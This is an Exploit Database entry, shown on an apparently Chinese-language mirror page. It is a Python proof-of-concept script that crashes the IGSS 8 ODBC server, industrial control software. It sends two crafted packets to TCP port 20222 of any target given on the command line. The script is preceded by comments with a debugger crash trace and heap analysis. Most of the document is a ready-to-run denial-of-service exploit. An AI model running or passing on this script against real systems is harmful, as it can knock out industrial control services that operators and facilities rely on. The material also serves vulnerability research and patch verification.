IGSS 8 ODBC Server – Multiple Remote Uninitialized Pointer Free Denial of Service Vulnerabilities

• Exploit Database
• 14 阅读

• 作者： Jeremy Brown
  日期： 2011-03-23
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/17033/

• #!/usr/bin/python
  # igss.py
  # IGSS 8 ODBC Server Multiple Remote Uninitialized Pointer Free DoS
  # Jeremy Brown / jbrown at patchtuesday dot org
  # Mar 2011
  #
  # There are multiple remote uninitialized pointer free conditions in IGSS's ODBC
  # server. By sending a specially crafted packet to listening port 20222, it is
  # possible to crash the server. Execution of arbitrary code is unlikely.
  #
  # Note: IGSS uses a 3rd party ODBC driver kit from Dr. DeeBee.
  #
  # HEAP[Odbcixv8se.exe]: Invalid allocation size - 8899AABB (exceeded 7ffdefff)
  # HEAP[Odbcixv8se.exe]: Invalid Address specified to RtlGetUserInfoHeap( 00150000, 00175008 )
  # (f10.cf8): Break instruction exception - code 80000003 (first chance)
  # eax=00175000 ebx=00175000 ecx=7c91ead5 edx=0102fc55 esi=00150000 edi=00175008
  # eip=7c90120e esp=0102fe58 ebp=0102fe5c iopl=0 nv up ei pl nz na po nc
  # cs=001bss=0023ds=0023es=0023fs=003bgs=0000 efl=00000202
  # ntdll!DbgBreakPoint:
  # 7c90120e ccint 3
  # 0:002> g
  # HEAP[Odbcixv8se.exe]: Invalid Address specified to RtlGetUserInfoHeap( 00150000, 00175008 )
  # (f10.cf8): Break instruction exception - code 80000003 (first chance)
  # eax=00175000 ebx=00175000 ecx=7c91ead5 edx=0102fc55 esi=00150000 edi=00175008
  # eip=7c90120e esp=0102fe58 ebp=0102fe5c iopl=0 nv up ei pl nz na po nc
  # cs=001bss=0023ds=0023es=0023fs=003bgs=0000 efl=00000202
  # ntdll!DbgBreakPoint:
  # 7c90120e ccint 3
  # 0:002> g
  # Heap corruption detected at 00175008
  # Heap corruption detected at 00177F78
  # Heap corruption detected at 001733D8
  # (f10.cf8): Access violation - code c0000005 (first chance)
  # First chance exceptions are reported before any exception handling.
  # This exception may be expected and handled.
  # eax=00173398 ebx=00000000 ecx=feeefeee edx=001733d8 esi=00173390 edi=00150000
  # eip=7c9276fc esp=0102fc34 ebp=0102fd08 iopl=0 nv up ei pl zr na pe nc
  # cs=001bss=0023ds=0023es=0023fs=003bgs=0000 efl=00010246
  # ntdll!RtlFreeHeapSlowly+0x392:
  # 7c9276fc 8901mov dword ptr [ecx],eaxds:0023:feeefeee=????????
  # 0:002> kb
  # ChildEBP RetAddrArgs to Child
  # 0102fd08 7c96f85a 00150000 50000061 00173398 ntdll!RtlFreeHeapSlowly+0x392
  # 0102fd7c 7c94bc4c 00150000 50000061 00173398 ntdll!RtlDebugFreeHeap+0x193
  # 0102fe64 7c927573 00150000 40000061 00173398 ntdll!RtlFreeHeapSlowly+0x37
  # 0102ff34 7c80fd4f 00150000 00000001 00173398 ntdll!RtlFreeHeap+0xf9
  # *** ERROR: Module load completed but symbols could not be loaded for Odbcixv8se.exe
  # 0102ff7c 0044531d 00aa001c 0102ffb4 00443abd kernel32!GlobalFree+0xb5
  # WARNING: Stack unwind information not available. Following frames may be wrong.
  # 0102ff88 00443abd 00173398 00000014 00000016 Odbcixv8se+0x4531d
  # 0102ffb4 7c80b729 00000710 00000000 00000000 Odbcixv8se+0x43abd
  # 0102ffec 00000000 004436f0 00000710 00000000 kernel32!BaseThreadStart+0x37
  #
  # feeefeee = freed memory
  #
  # RtlFreeHeap() takes three arguments:
  # HeapHandle --> 0x173398
  # Flags--> 0x00000001
  # HeapBase --> 0x173398
  #
  # HeapBase is the pointer to the memory block that is going to be freed.
  #
  # 0:002> dd 173398
  # 00173398001733d8 -----------------------------
  # 001733a8feeefeee feeefeee feeefeee feeefeee-
  # 001733b8feeefeee feeefeee feeefeee feeefeee-
  # 001733c8feeefeee feeefeee feeefeee feeefeee-
  # 001733d8feeefeee feeefeee feeefeee feeefeee <-
  # 001733e8feeefeee feeefeee feeefeee feeefeee
  # 001733f8feeefeee feeefeee feeefeee feeefeee
  # 00173408feeefeee feeefeee feeefeee feeefeee
  #
  # In this example, the pointer to free happens to point to free memory.
  #
  # Tested IGSS 8 (Odbcixv8se.exe version 10299) on Windows
  #
  # Fixed version: IGSS 8 (Odbcixv8se.exe version 11003)
  # http://www.syware.com/download/drdeebee/gold_bug.txt
  #
  
  import sys
  import socket
  
  req_1=(
  "\x00\x00\x00\x34"
  "\x02\x00\x00\x00\x02\x00\x00\x00\x02\x2e\x00\x00\x00\x00\x19\x49"
  "\x47\x53\x53\x33\x32\x76\x38\x20\x4f\x44\x42\x43\x20\x4e\x65\x74"
  "\x77\x6f\x72\x6b\x20\x44\x53\x00\x00\x00\x00\x02\x20\x00\x00\x00"
  "\x00\x02\x20\x00"
  )
  
  req_2=(
  "\x00\x00\x00\xff"+# length
  "\x16"+# switch code
  "\x77" * 254+# begin query here
  "\x88\x99\xaa\xbb" # test
  )
  
  if len(sys.argv)!=2:
   print "Usage: %s <target>" % sys.argv[0]
   sys.exit(0)
  
  target=sys.argv[1]
  port=20222
  cs=target,port
  
  sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
  sock.connect(cs)
  sock.settimeout(1)
  
  sock.send(req_1)
  
  try:
   resp=sock.recv(1024)
   print "resp_1 = %s\n"%resp.encode("hex")
  except: pass
  
  sock.send(req_2)
  
  try:
   resp=sock.recv(1024)
   print "resp_2 = %s\n"%resp.encode("hex")
  except: pass
  
  sock.close()